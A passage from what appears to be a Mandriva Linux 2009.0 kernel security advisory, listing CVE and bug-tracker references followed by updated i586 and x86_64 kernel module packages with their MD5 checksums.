 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3528
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3831
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4554
 https://qa.mandriva.com/43532
 https://qa.mandriva.com/43372
 https://qa.mandriva.com/44752
 https://qa.mandriva.com/43885
 https://qa.mandriva.com/44803
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
2009.0/i586/nvidia-current-kernel-2.6.27.4-desktop-1mnb-177.70-2.3mdv2009.0.i586.rpm 8114191fdf4eb331527e266d64ee8ede 2009.0/i586/nvidia-current-kernel-2.6.27.4-desktop586-1mnb-177.70-2.3mdv2009.0.i586.rpm 442f7d899356849023fbe116c6bedd59 2009.0/i586/nvidia-current-kernel-2.6.27.4-server-1mnb-177.70-2.3mdv2009.0.i586.rpm d1105beb4d5f38a8ead9eb00ee76997f 2009.0/i586/nvidia-current-kernel-desktop586-latest-177.70-1.20081103.2.3mdv2009.0.i586.rpm 37c1a2ec558c2fb51dc77030aab18f57 2009.0/i586/nvidia-current-kernel-desktop-latest-177.70-1.20081103.2.3mdv2009.0.i586.rpm 21634aaa76b1c3bffdc46e5a1981acca 2009.0/i586/nvidia-current-kernel-server-latest-177.70-1.20081103.2.3mdv2009.0.i586.rpm 75fa6f12ec5ab01802404100fd8979b0 2009.0/i586/omfs-kernel-2.6.27.4-desktop-1mnb-0.8.0-1mdv2009.0.i586.rpm 6da40c13cb157deb7fffb4cff3e77319 2009.0/i586/omfs-kernel-2.6.27.4-desktop586-1mnb-0.8.0-1mdv2009.0.i586.rpm 3b603c2292892a161230f06a948af2da 2009.0/i586/omfs-kernel-2.6.27.4-server-1mnb-0.8.0-1mdv2009.0.i586.rpm b750da72e946c6c160c76d8d11250e42 2009.0/i586/omfs-kernel-desktop586-latest-0.8.0-1.20081103.1mdv2009.0.i586.rpm bcbf8269b1fe852b61a5b558d254b37c 2009.0/i586/omfs-kernel-desktop-latest-0.8.0-1.20081103.1mdv2009.0.i586.rpm c618b73eeb9f15094b18e2d80a4d79f3 2009.0/i586/omfs-kernel-server-latest-0.8.0-1.20081103.1mdv2009.0.i586.rpm e187b074109fedaf9b9771c4da2a96a5 2009.0/i586/omnibook-kernel-2.6.27.4-desktop-1mnb-20080513-0.274.1mdv2009.0.i586.rpm 941b771c5cd0598695e8a3ea665302b5 2009.0/i586/omnibook-kernel-2.6.27.4-desktop586-1mnb-20080513-0.274.1mdv2009.0.i586.rpm 9d7336b34390f13ff92c53e1478c984a 2009.0/i586/omnibook-kernel-2.6.27.4-server-1mnb-20080513-0.274.1mdv2009.0.i586.rpm eccd344fefcaa996cafcc8ebce16050c 2009.0/i586/omnibook-kernel-desktop586-latest-20080513-1.20081103.0.274.1mdv2009.0.i586.rpm 8a18b671a866951f1d553ae79a570a96 2009.0/i586/omnibook-kernel-desktop-latest-20080513-1.20081103.0.274.1mdv2009.0.i586.rpm 8db089d8a0df01a301e608eb1a12fa77 
2009.0/i586/omnibook-kernel-server-latest-20080513-1.20081103.0.274.1mdv2009.0.i586.rpm b171c1bc5dddc32d6d79dad8e3f3d276 2009.0/i586/opencbm-kernel-2.6.27.4-desktop-1mnb-0.4.2a-1mdv2008.1.i586.rpm ab888569f4827cb9a58ca70adb24af9b 2009.0/i586/opencbm-kernel-2.6.27.4-desktop586-1mnb-0.4.2a-1mdv2008.1.i586.rpm dc08dcda692acd8b73c91d451c1a3751 2009.0/i586/opencbm-kernel-2.6.27.4-server-1mnb-0.4.2a-1mdv2008.1.i586.rpm 52896db6af58703701b2ddca4876ea6e 2009.0/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20081103.1mdv2008.1.i586.rpm 64c7ec015c8ad685c54a55876eaa803a 2009.0/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20081103.1mdv2008.1.i586.rpm 4d3de147372f65cedec14b7681ec8fec 2009.0/i586/opencbm-kernel-server-latest-0.4.2a-1.20081103.1mdv2008.1.i586.rpm 9fbe037c5569de75a4ca04db09e73179 2009.0/i586/ov51x-jpeg-kernel-2.6.27.4-desktop-1mnb-1.5.8-1mdv2009.0.i586.rpm 27cdd931be93ce026bd989265080623d 2009.0/i586/ov51x-jpeg-kernel-2.6.27.4-desktop586-1mnb-1.5.8-1mdv2009.0.i586.rpm c7d2d072fe263e53bb1fb0316f4c6ba3 2009.0/i586/ov51x-jpeg-kernel-2.6.27.4-server-1mnb-1.5.8-1mdv2009.0.i586.rpm 5212ac1714fa8e7b637f013f31ffe596 2009.0/i586/ov51x-jpeg-kernel-desktop586-latest-1.5.8-1.20081103.1mdv2009.0.i586.rpm 343048ce6070308dd5cd723fcd11de3b 2009.0/i586/ov51x-jpeg-kernel-desktop-latest-1.5.8-1.20081103.1mdv2009.0.i586.rpm 64f4b13efa5778e2755c66949f022fbd 2009.0/i586/ov51x-jpeg-kernel-server-latest-1.5.8-1.20081103.1mdv2009.0.i586.rpm 25f7d2eef8b034053db58386a940030b 2009.0/i586/qc-usb-kernel-2.6.27.4-desktop-1mnb-0.6.6-6mdv2009.0.i586.rpm 7ad14a6942f8c143429d96c89d10e071 2009.0/i586/qc-usb-kernel-2.6.27.4-desktop586-1mnb-0.6.6-6mdv2009.0.i586.rpm 2dc33d46ec22b34ecbd4f8ab58131b77 2009.0/i586/qc-usb-kernel-2.6.27.4-server-1mnb-0.6.6-6mdv2009.0.i586.rpm 6f56de9487add6f85f1400a5ef128ef1 2009.0/i586/qc-usb-kernel-desktop586-latest-0.6.6-1.20081103.6mdv2009.0.i586.rpm 6d065121cd9d907c2041d40cf0aec8a9 2009.0/i586/qc-usb-kernel-desktop-latest-0.6.6-1.20081103.6mdv2009.0.i586.rpm 
16898de62cbf5788a3eba210cbf85912 2009.0/i586/qc-usb-kernel-server-latest-0.6.6-1.20081103.6mdv2009.0.i586.rpm 1c53121930462ced59cd5fc480ef92ef 2009.0/i586/rt2860-kernel-2.6.27.4-desktop-1mnb-1.7.0.0-2mdv2009.0.i586.rpm d7d2aeaaf374a833c498d982c07c66dc 2009.0/i586/rt2860-kernel-2.6.27.4-desktop586-1mnb-1.7.0.0-2mdv2009.0.i586.rpm a9d6360a2f210da1616ee0d515d911e9 2009.0/i586/rt2860-kernel-2.6.27.4-server-1mnb-1.7.0.0-2mdv2009.0.i586.rpm 64ed536cbdc1a0072684facaa7efe34c 2009.0/i586/rt2860-kernel-desktop586-latest-1.7.0.0-1.20081103.2mdv2009.0.i586.rpm fda2a0fc51844bedfa6c3a1a9b0a065e 2009.0/i586/rt2860-kernel-desktop-latest-1.7.0.0-1.20081103.2mdv2009.0.i586.rpm a2a7ba4d11853ca799c11d1c057785ff 2009.0/i586/rt2860-kernel-server-latest-1.7.0.0-1.20081103.2mdv2009.0.i586.rpm 4d5980f1e5cb0f6b9baf0aa2c365ed70 2009.0/i586/rt2870-kernel-2.6.27.4-desktop-1mnb-1.3.1.0-2mdv2009.0.i586.rpm 52d6f2251df72952a163489e4e090076 2009.0/i586/rt2870-kernel-2.6.27.4-desktop586-1mnb-1.3.1.0-2mdv2009.0.i586.rpm d78c37fa6adc19b57907288883ccac22 2009.0/i586/rt2870-kernel-2.6.27.4-server-1mnb-1.3.1.0-2mdv2009.0.i586.rpm 2bb6ecb4d7b984bbf92e2508b4bf2d07 2009.0/i586/rt2870-kernel-desktop586-latest-1.3.1.0-1.20081103.2mdv2009.0.i586.rpm 26bacbf0a67027b9c5538f5e1d800930 2009.0/i586/rt2870-kernel-desktop-latest-1.3.1.0-1.20081103.2mdv2009.0.i586.rpm 19ec1011940eebb0d4ab6bc460f56962 2009.0/i586/rt2870-kernel-server-latest-1.3.1.0-1.20081103.2mdv2009.0.i586.rpm 21555e24a3a7b8e5e13b497b4bdda888 2009.0/i586/rtl8187se-kernel-2.6.27.4-desktop-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm c74cc82c581e63cce392a288f2b878d1 2009.0/i586/rtl8187se-kernel-2.6.27.4-desktop586-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm 624804b8ff56fb12252dab835fdb718b 2009.0/i586/rtl8187se-kernel-2.6.27.4-server-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm 95b0a1ec0f5673410477700c8b70579a 2009.0/i586/rtl8187se-kernel-desktop586-latest-1016.20080716-1.20081103.1.1mdv2009.0.i586.rpm ee40b0cc41bcbedb1978bcb416c0e228 
2009.0/i586/rtl8187se-kernel-desktop-latest-1016.20080716-1.20081103.1.1mdv2009.0.i586.rpm ef584c292af203700d0cdeeb60371df0 2009.0/i586/rtl8187se-kernel-server-latest-1016.20080716-1.20081103.1.1mdv2009.0.i586.rpm 171f50b6097ff4ed943d235412ee511e 2009.0/i586/slmodem-kernel-2.6.27.4-desktop-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm 02ce2b1680cb872e8e7900f9b04a4fe9 2009.0/i586/slmodem-kernel-2.6.27.4-desktop586-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm 654172d635d014b40a4d6ced78e2d694 2009.0/i586/slmodem-kernel-2.6.27.4-server-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm 617ad09223b5da97d777cb086c79347c 2009.0/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20081103.0.20080817.1mdv2009.0.i586.rpm 537b5b2b4381eae30329550a29d92df6 2009.0/i586/slmodem-kernel-desktop-latest-2.9.11-1.20081103.0.20080817.1mdv2009.0.i586.rpm c23768f3a2b5ce96bd5496956b1192b4 2009.0/i586/slmodem-kernel-server-latest-2.9.11-1.20081103.0.20080817.1mdv2009.0.i586.rpm beb2f00b2fa394f2fd25c1a419124321 2009.0/i586/squashfs-lzma-kernel-2.6.27.4-desktop-1mnb-3.3-5mdv2009.0.i586.rpm 4e04bda51849d92e92aaaadc401d5b72 2009.0/i586/squashfs-lzma-kernel-2.6.27.4-desktop586-1mnb-3.3-5mdv2009.0.i586.rpm f12202cdf0fa425c8bb8924f5c20c719 2009.0/i586/squashfs-lzma-kernel-2.6.27.4-server-1mnb-3.3-5mdv2009.0.i586.rpm c8cf65026c0e3dd2d1391a021d933fc7 2009.0/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20081103.5mdv2009.0.i586.rpm 26cdcc142de71a295063ed06f792d3af 2009.0/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20081103.5mdv2009.0.i586.rpm a55cf0b17888fb83ebc7728526dbc715 2009.0/i586/squashfs-lzma-kernel-server-latest-3.3-1.20081103.5mdv2009.0.i586.rpm 0f6a1dc0011f1c92a53c095ec1d4ec9f 2009.0/i586/tp_smapi-kernel-2.6.27.4-desktop-1mnb-0.37-2mdv2009.0.i586.rpm 3d8fa83a0b50cbc223bb26248c46a2d2 2009.0/i586/tp_smapi-kernel-2.6.27.4-desktop586-1mnb-0.37-2mdv2009.0.i586.rpm 3765bc17b489e48671736d1c9a7a15b2 2009.0/i586/tp_smapi-kernel-2.6.27.4-server-1mnb-0.37-2mdv2009.0.i586.rpm 05a274ff9aa0c4800f748b1adf8c0ca8 
2009.0/i586/tp_smapi-kernel-desktop586-latest-0.37-1.20081103.2mdv2009.0.i586.rpm 2d0a3ec08fe46521b03230374fe21f13 2009.0/i586/tp_smapi-kernel-desktop-latest-0.37-1.20081103.2mdv2009.0.i586.rpm f9d94d3034572f16502b0a387f38a663 2009.0/i586/tp_smapi-kernel-server-latest-0.37-1.20081103.2mdv2009.0.i586.rpm b96e502f70fabec4e66c71928c6d3fc8 2009.0/i586/vboxadd-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm c96cd5a5e194e67a14a003a0be06d785 2009.0/i586/vboxadd-kernel-2.6.27.4-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm 6ca17d51b41d741a6b4cb851b0bbf84d 2009.0/i586/vboxadd-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.i586.rpm 1b0cfe92246f61e57744aeda1a924dbf 2009.0/i586/vboxadd-kernel-desktop586-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm c3699e6091d24971e1040c8e49b8bd7a 2009.0/i586/vboxadd-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm d167d9e6f440798ef96313926ce0aa9c 2009.0/i586/vboxadd-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm f86bf849193304c66537768239afd183 2009.0/i586/vboxvfs-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm c577a720c0a0b05feb8a777e01b23117 2009.0/i586/vboxvfs-kernel-2.6.27.4-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm 46daba29c3656290df7125f0d9c5a657 2009.0/i586/vboxvfs-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.i586.rpm 0757a9d5507e1b78c8af4f0ec2fcbca7 2009.0/i586/vboxvfs-kernel-desktop586-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm 58fa363ded3d32dded985e9e393e61d0 2009.0/i586/vboxvfs-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm 79d04b8b6da4230ae4f5247c4b9bb050 2009.0/i586/vboxvfs-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm aa87c0d7c23ee96d68a6922ac01ec5c8 2009.0/i586/vhba-kernel-2.6.27.4-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm 921f83a72a4b880dc34b8d729e5e59f0 2009.0/i586/vhba-kernel-2.6.27.4-desktop586-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm e65f431b06a7a510db0e9b8dc5e627a4 2009.0/i586/vhba-kernel-2.6.27.4-server-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm 
c35a379751fb20657e2f9bfe950751eb 2009.0/i586/vhba-kernel-desktop586-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.i586.rpm cbaea9dff2fbf424e4569c01c33862c7 2009.0/i586/vhba-kernel-desktop-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.i586.rpm 8205d8d0d5ffcefc2c0fc3a8804622c0 2009.0/i586/vhba-kernel-server-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.i586.rpm 19d9ca5fecde7236443d31256d8b57f0 2009.0/i586/virtualbox-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm ba63c7e1924ed8f665e60709fb35a196 2009.0/i586/virtualbox-kernel-2.6.27.4-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm 2a093fd2afa956acc0fc35817978d294 2009.0/i586/virtualbox-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.i586.rpm 8bdef255c2cfcf7f05913f0561a7f1d2 2009.0/i586/virtualbox-kernel-desktop586-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm 1849334aa93aa335532907a755b3871d 2009.0/i586/virtualbox-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm dcf04d332cec94932656bf4bb1bdc283 2009.0/i586/virtualbox-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm 8a685d9c111e106c699d7d47d093c432 2009.0/i586/vpnclient-kernel-2.6.27.4-desktop-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm 77636aeacc19e8256b9febc077c27e00 2009.0/i586/vpnclient-kernel-2.6.27.4-desktop586-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm 7d4b4f915950fe55b4425d1b2bff481e 2009.0/i586/vpnclient-kernel-2.6.27.4-server-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm 02f0fbf02e9bfe6d4926196d892d2257 2009.0/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20081103.3mdv2009.0.i586.rpm c8f85729c9c2a8764bba33b96a5f65fa 2009.0/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20081103.3mdv2009.0.i586.rpm 046722547c486dfb051857d8aeec040b 2009.0/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20081103.3mdv2009.0.i586.rpm b154ea6c4d96dfa8e57773bd90ab7347 2009.0/SRPMS/kernel-2.6.27.4-1mnb2.src.rpm Mandriva Linux 2009.0/X86_64: edde427053c0325b157ba601cc044f4b 2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.4-desktop-1mnb-0.5.1-2mdv2008.0.x86_64.rpm 
d10c758ae813b24af7c85f52779c320f 2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.4-server-1mnb-0.5.1-2mdv2008.0.x86_64.rpm 3ba7297853bf4eb4c2c07ff180f0132d 2009.0/x86_64/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20081103.2mdv2008.0.x86_64.rpm 9603d7a26e44a0f1d13d3bf9097e508b 2009.0/x86_64/alsa_raoppcm-kernel-server-latest-0.5.1-1.20081103.2mdv2008.0.x86_64.rpm 917b4c0ad28f8131f931d31384843850 2009.0/x86_64/drm-experimental-kernel-2.6.27.4-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm 099212e3d26d235941f2af7f360820c0 2009.0/x86_64/drm-experimental-kernel-2.6.27.4-server-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm 5319201ced91ff62ccb79efb8d11d6c2 2009.0/x86_64/drm-experimental-kernel-desktop-latest-2.3.0-1.20081103.2.20080912.1mdv2009.0.x86_64.rpm b293f3f4fbce793f3bff6b5e174cfb05 2009.0/x86_64/drm-experimental-kernel-server-latest-2.3.0-1.20081103.2.20080912.1mdv2009.0.x86_64.rpm a96f2e4989cd8ed91014c77b44239ec2 2009.0/x86_64/et131x-kernel-2.6.27.4-desktop-1mnb-1.2.3-7mdv2009.0.x86_64.rpm a9a374da5682e5178d36f2d406d8c218 2009.0/x86_64/et131x-kernel-2.6.27.4-server-1mnb-1.2.3-7mdv2009.0.x86_64.rpm 6e90ed1607e0b7fe8d209f8db921badc 2009.0/x86_64/et131x-kernel-desktop-latest-1.2.3-1.20081103.7mdv2009.0.x86_64.rpm 63bb5e97118e06f1886674fa87667335 2009.0/x86_64/et131x-kernel-server-latest-1.2.3-1.20081103.7mdv2009.0.x86_64.rpm 1774fa42da75c7fb14d68c7b29823963 2009.0/x86_64/fglrx-kernel-2.6.27.4-desktop-1mnb-8.522-3mdv2009.0.x86_64.rpm f18a7786083993c33ef12f82b2bd0e24 2009.0/x86_64/fglrx-kernel-2.6.27.4-server-1mnb-8.522-3mdv2009.0.x86_64.rpm 5ed11fbc7ae42ba9bfa9329e92018c06 2009.0/x86_64/fglrx-kernel-desktop-latest-8.522-1.20081103.3mdv2009.0.x86_64.rpm 4a825366b32f7003c969314a1716ad98 2009.0/x86_64/fglrx-kernel-server-latest-8.522-1.20081103.3mdv2009.0.x86_64.rpm 98e7002c359470d13a827880c559af37 2009.0/x86_64/gnbd-kernel-2.6.27.4-desktop-1mnb-2.03.07-2mdv2009.0.x86_64.rpm d23b4af98e62e6497efc90a617234f41 
2009.0/x86_64/gnbd-kernel-2.6.27.4-server-1mnb-2.03.07-2mdv2009.0.x86_64.rpm 2852a45b3ca5ecc069e90d4cc8537e9b 2009.0/x86_64/gnbd-kernel-desktop-latest-2.03.07-1.20081103.2mdv2009.0.x86_64.rpm 745b2535260294c01243e065a0e9b6cd 2009.0/x86_64/gnbd-kernel-server-latest-2.03.07-1.20081103.2mdv2009.0.x86_64.rpm 8e5f0ce165e2ca8cdb4d1e08b402e7d1 2009.0/x86_64/hsfmodem-kernel-2.6.27.4-desktop-1mnb-7.68.00.13-1mdv2009.0.x86_64.rpm 39af5b80488bf883f0ee3bbb62025eb2 2009.0/x86_64/hsfmodem-kernel-2.6.27.4-server-1mnb-7.68.00.13-1mdv2009.0.x86_64.rpm c377b77e2cd7aae40f07aa5cf41c6d9a 2009.0/x86_64/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20081103.1mdv2009.0.x86_64.rpm f21246718d60ccef70da23e5ce6bc6b5 2009.0/x86_64/hsfmodem-kernel-server-latest-7.68.00.13-1.20081103.1mdv2009.0.x86_64.rpm 3ef5f09024a0c13092ef3898ed348b14 2009.0/x86_64/hso-kernel-2.6.27.4-desktop-1mnb-1.2-2mdv2009.0.x86_64.rpm fb21951b4951dcb958643fc214a3b90f 2009.0/x86_64/hso-kernel-2.6.27.4-server-1mnb-1.2-2mdv2009.0.x86_64.rpm de4755de3c16cdcd63428c1857e03fb9 2009.0/x86_64/hso-kernel-desktop-latest-1.2-1.20081103.2mdv2009.0.x86_64.rpm 1862c1524f0dabc1be563171978bec1d 2009.0/x86_64/hso-kernel-server-latest-1.2-1.20081103.2mdv2009.0.x86_64.rpm 7f06103920f1b0bee5bd46ef7ee35a32 2009.0/x86_64/iscsitarget-kernel-2.6.27.4-desktop-1mnb-0.4.16-4mdv2009.0.x86_64.rpm a76a34ea9903d6555d91109692505581 2009.0/x86_64/iscsitarget-kernel-2.6.27.4-server-1mnb-0.4.16-4mdv2009.0.x86_64.rpm 9a4499e2390892cf38b59df9ef3d35de 2009.0/x86_64/iscsitarget-kernel-desktop-latest-0.4.16-1.20081103.4mdv2009.0.x86_64.rpm 98eb6870421f1448471196b077d797ad 2009.0/x86_64/iscsitarget-kernel-server-latest-0.4.16-1.20081103.4mdv2009.0.x86_64.rpm c7c842aec494f3e38c261506c0547223 2009.0/x86_64/kernel-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm 4b8766c11f016d1dadf6f2d8e795b0fb 2009.0/x86_64/kernel-desktop-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm 5478882b39f0cc7cd05e6df8851bf61e 2009.0/x86_64/kernel-desktop-devel-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm 
de8802b59abbc0e6153916a2669451cf 2009.0/x86_64/kernel-desktop-devel-latest-2.6.27.4-1mnb2.x86_64.rpm 81c95cef55a8b48bb7d283e384bb2c24 2009.0/x86_64/kernel-desktop-latest-2.6.27.4-1mnb2.x86_64.rpm 4523744b73600713bea980f973edb93a 2009.0/x86_64/kernel-doc-2.6.27.4-1mnb2.x86_64.rpm 9acc26af4d76f58a63de3759e9182955 2009.0/x86_64/kernel-server-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm 1556e73969387b60c30590b695a9c9ed 2009.0/x86_64/kernel-server-devel-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm 22e12d01ab37f52241a2855713d90739 2009.0/x86_64/kernel-server-devel-latest-2.6.27.4-1mnb2.x86_64.rpm 0bc0e4758708747635e8bfb1aab7c7bd 2009.0/x86_64/kernel-server-latest-2.6.27.4-1mnb2.x86_64.rpm f07b5b02fc4a21102e614e749500ae57 2009.0/x86_64/kernel-source-2.6.27.4-1mnb-1-1mnb2.x86_64.rpm 3ad3eb3d2d8990ebe3404283aac6feb7 2009.0/x86_64/kernel-source-latest-2.6.27.4-1mnb2.x86_64.rpm 87229f3144e2dba7ccf70b046569b89b 2009.0/x86_64/kqemu-kernel-2.6.27.4-desktop-1mnb-1.4.0pre1-0.x86_64.rpm 4e1f98f6c792b13b5e0dad893336df23 2009.0/x86_64/kqemu-kernel-2.6.27.4-server-1mnb-1.4.0pre1-0.x86_64.rpm 4044a616b6421bb8fc7b806025ea1da4 2009.0/x86_64/kqemu-kernel-desktop-latest-1.4.0pre1-1.20081103.0.x86_64.rpm cd464e39c45d8f3e6618c423fbe76df1 2009.0/x86_64/kqemu-kernel-server-latest-1.4.0pre1-1.20081103.0.x86_64.rpm df8a7b72d394b1f800809a7d51f88ca5 2009.0/x86_64/lirc-kernel-2.6.27.4-desktop-1mnb-0.8.3-4.1mdv2009.0.x86_64.rpm e8bb52fe06e4fce19876d66a3b298564 2009.0/x86_64/lirc-kernel-2.6.27.4-server-1mnb-0.8.3-4.1mdv2009.0.x86_64.rpm 177902f579887379aed116e473f7af77 2009.0/x86_64/lirc-kernel-desktop-latest-0.8.3-1.20081103.4.1mdv2009.0.x86_64.rpm a397527b920d758f326e541c6da06226 2009.0/x86_64/lirc-kernel-server-latest-0.8.3-1.20081103.4.1mdv2009.0.x86_64.rpm 6ea88859285111f130ec7b143dfbf5f6 2009.0/x86_64/lzma-kernel-2.6.27.4-desktop-1mnb-4.43-24mdv2009.0.x86_64.rpm 4b6268dfa3da64fedbe17a2cc63696db 2009.0/x86_64/lzma-kernel-2.6.27.4-server-1mnb-4.43-24mdv2009.0.x86_64.rpm 00e1af05edc796db266ed190e728efff 
2009.0/x86_64/lzma-kernel-desktop-latest-4.43-1.20081103.24mdv2009.0.x86_64.rpm 8b989058f9507cac3a665e8ba6e7c4ac 2009.0/x86_64/lzma-kernel-server-latest-4.43-1.20081103.24mdv2009.0.x86_64.rpm 4164681efe2b2c20fff089f8c6b73fa6 2009.0/x86_64/madwifi-kernel-2.6.27.4-desktop-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm bb1ff664073b5da730be99650be7e58d 2009.0/x86_64/madwifi-kernel-2.6.27.4-server-1mnb-0.9.4-3.r3835mdv2009.0.x86_64.rpm 945b737037f6cc7be4778d1e59c17b76 2009.0/x86_64/madwifi-kernel-desktop-latest-0.9.4-1.20081103.3.r3835mdv2009.0.x86_64.rpm 11b82f73622f3da01305f477b2263429 2009.0/x86_64/madwifi-kernel-server-latest-0.9.4-1.20081103.3.r3835mdv2009.0.x86_64.rpm 353a3a440247a94b89d9a2043ec5ab6a 2009.0/x86_64/nvidia173-kernel-2.6.27.4-desktop-1mnb-173.14.12-4mdv2009.0.x86_64.rpm a4c8004cfef6afbb27e4accba7cea8bb 2009.0/x86_64/nvidia173-kernel-2.6.27.4-server-1mnb-173.14.12-4mdv2009.0.x86_64.rpm dc7264b488daf2c7f2e27fe2896a093e 2009.0/x86_64/nvidia173-kernel-desktop-latest-173.14.12-1.20081103.4mdv2009.0.x86_64.rpm 318fda8e08f60f18f9e18e8d1ece5b46 2009.0/x86_64/nvidia173-kernel-server-latest-173.14.12-1.20081103.4mdv2009.0.x86_64.rpm 551a4d1c93b31b60d53a2d7c932766ee 2009.0/x86_64/nvidia71xx-kernel-2.6.27.4-desktop-1mnb-71.86.06-5mdv2009.0.x86_64.rpm aaf2925ad1c9f7e23027d830c6b4b149 2009.0/x86_64/nvidia71xx-kernel-2.6.27.4-server-1mnb-71.86.06-5mdv2009.0.x86_64.rpm 597f72e74de27308c94a1f3c6d387f1d 2009.0/x86_64/nvidia71xx-kernel-desktop-latest-71.86.06-1.20081103.5mdv2009.0.x86_64.rpm ff65f397ce63ae9cc6f06834f5d8b0c6 2009.0/x86_64/nvidia71xx-kernel-server-latest-71.86.06-1.20081103.5mdv2009.0.x86_64.rpm f9c4833bccb538809790bd3423b7cb40 2009.0/x86_64/nvidia96xx-kernel-2.6.27.4-desktop-1mnb-96.43.07-5mdv2009.0.x86_64.rpm b051687d4d953ab011c5f3ff0f28a441 2009.0/x86_64/nvidia96xx-kernel-2.6.27.4-server-1mnb-96.43.07-5mdv2009.0.x86_64.rpm 59e1b97e5003d7c626e900ef596a76b5 2009.0/x86_64/nvidia96xx-kernel-desktop-latest-96.43.07-1.20081103.5mdv2009.0.x86_64.rpm 
e2fe3240f11b23556e7d486691c978b0 2009.0/x86_64/nvidia96xx-kernel-server-latest-96.43.07-1.20081103.5mdv2009.0.x86_64.rpm 37164772860f8ff6164c18c8f0fb3cb0 2009.0/x86_64/nvidia-current-kernel-2.6.27.4-desktop-1mnb-177.70-2.3mdv2009.0.x86_64.rpm fe08b175f9986da8db5c1901a09de1d3 2009.0/x86_64/nvidia-current-kernel-2.6.27.4-server-1mnb-177.70-2.3mdv2009.0.x86_64.rpm d9182de2d4ec00a58b6ee1d34093892f 2009.0/x86_64/nvidia-current-kernel-desktop-latest-177.70-1.20081103.2.3mdv2009.0.x86_64.rpm 66301b0d7d866d345069607e868332da 2009.0/x86_64/nvidia-current-kernel-server-latest-177.70-1.20081103.2.3mdv2009.0.x86_64.rpm eb57129d77fdd68cf5b597e47a168640 2009.0/x86_64/omfs-kernel-2.6.27.4-desktop-1mnb-0.8.0-1mdv2009.0.x86_64.rpm c84c1c2780cadd494b50d23f37d6bb93 2009.0/x86_64/omfs-kernel-2.6.27.4-server-1mnb-0.8.0-1mdv2009.0.x86_64.rpm 3517951f78740e235501c29303d9ed2f 2009.0/x86_64/omfs-kernel-desktop-latest-0.8.0-1.20081103.1mdv2009.0.x86_64.rpm 6964d1f8a5eacad06961e619782a5676 2009.0/x86_64/omfs-kernel-server-latest-0.8.0-1.20081103.1mdv2009.0.x86_64.rpm f9fa126b5ff0be631ca701e7009c1622 2009.0/x86_64/omnibook-kernel-2.6.27.4-desktop-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm 5c8bbcae3ae10b8b1c5f76dfe55ddf8e 2009.0/x86_64/omnibook-kernel-2.6.27.4-server-1mnb-20080513-0.274.1mdv2009.0.x86_64.rpm 27e65bbde30effada6111ed2fbe69851 2009.0/x86_64/omnibook-kernel-desktop-latest-20080513-1.20081103.0.274.1mdv2009.0.x86_64.rpm e917a54771478c9f796f228dc3ed3ec6 2009.0/x86_64/omnibook-kernel-server-latest-20080513-1.20081103.0.274.1mdv2009.0.x86_64.rpm ae4d4ff7ae9ff50a2e9c9b77fe51c341 2009.0/x86_64/opencbm-kernel-2.6.27.4-desktop-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm e9eabb741feb646f18021f05e15c2f1e 2009.0/x86_64/opencbm-kernel-2.6.27.4-server-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm c23326a1caad7188410644ad898c6514 